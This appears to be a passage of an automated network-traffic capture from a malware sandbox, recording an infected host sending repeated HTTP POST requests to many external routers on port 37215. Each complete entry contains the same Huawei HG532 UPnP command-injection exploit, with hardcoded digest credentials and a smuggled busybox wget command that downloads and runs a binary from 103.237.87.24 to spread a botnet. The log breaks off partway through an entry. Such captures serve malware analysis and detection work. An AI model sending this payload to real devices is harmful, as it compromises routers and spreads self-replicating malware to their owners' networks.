2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1934192.168.2.1359682157.242.26.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552829027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1935192.168.2.1358058197.155.191.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552829981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1936192.168.2.1344030133.94.204.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.552891970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1937192.168.2.1334554202.135.81.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553096056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1938192.168.2.133385641.200.140.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553139925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1939192.168.2.1343328157.193.47.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553188086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1940192.168.2.1351256157.129.167.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553292990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1941192.168.2.1355438157.33.50.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553312063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1942192.168.2.1360238148.76.123.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553325891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1943192.168.2.1344790157.213.76.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553313017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1944192.168.2.1343474157.253.236.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.553499937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
